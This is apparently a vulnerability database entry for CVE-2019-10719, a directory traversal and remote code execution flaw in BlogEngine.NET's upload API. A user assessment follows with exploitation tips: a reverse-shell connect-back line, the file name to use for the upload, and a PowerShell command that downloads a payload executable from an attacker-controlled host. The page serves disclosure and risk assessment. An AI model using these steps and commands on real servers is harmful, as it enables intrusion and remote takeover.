CVE-2019-10719

BlogEngine.NET 3.3.7.0 and earlier allows Directory Traversal and Remote Code Execution because file creation is mishandled, related to /api/upload and BlogEngine.NET/AppCode/Api/UploadController.cs. NOTE: this issue exists because of an incomplete fix for CVE-2019-6714.

Recent assessments:

Leafry at February 06, 2021 4:28pm UTC reported:

This attack was extremely easy to use. My jaw almost hit the ground at the ease. My only worry is that this will be a very hard attack to find in the wild as it depends on specific versions of the software to work.

Things to keep in mind:
-You will need to change your IP address and port inside the script. Near the beginning of the script, there is a line for System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient(”\(LHOST", \)LPORT). Set the host and port accordingly.
-I have had several instances where I would need to restart the BlogEngine server or the reverse shell would hang up in some terminal windows but not others, this exploit creates a very unstable shell.
-The script should be named PostView.ascx

Moving from here:
-It is recommended to upgrade to a different shell as soon as possible.
-I have had the most luck with Meterpreter. Creating a reverse shell with msfvenom and then uploading it to the BlogEngine server with PowerShell. –> powershell Invoke-WebRequest -Uri <http://10.10.10.10:8888/reverse.exe&gt; -Outfile reverse.exe

Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0